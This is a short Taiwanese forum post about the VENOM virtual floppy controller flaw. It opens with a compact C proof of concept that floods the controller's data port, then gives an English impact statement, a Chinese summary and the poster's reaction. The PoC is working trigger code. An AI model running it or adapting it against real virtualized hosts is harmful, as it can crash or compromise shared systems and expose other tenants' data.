#include <sys/io.h>
#define FIFO 0x3f5
int main() {
int i;
iopl(3);
outb(0x0a,0x3f5); /* READ ID */
for (i=0;i<10000000;i++)
outb(0x42,0x3f5); /* push */
}
Exploitation of the VENOM vulnerability can expose access to corporate intellectual
property(IP), in addition to sensitive and personally identifiable information(PII),
potentially impacting the thousands of organizations and millions of end users that
rely on affected VMs for the allocation of shared computing resources , as well as
connectivity, storage, security, and privacy.
大意:
透過VENOM漏洞,可以偷到公司知產、敏感訊息、個資等等
除此之外,還可能影想多達千萬相關機構的。這些機構的VM的
資源、連接資訊、儲存資訊、安全性及隱私都會被影響。
心得:
開頭附上的POC...嚇到! 就這樣= =||||
--
※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 211.22.20.13
※ 文章網址: https://www.ptt.cc/bbs/PCCU-CS/M.1432265034.A.46F.html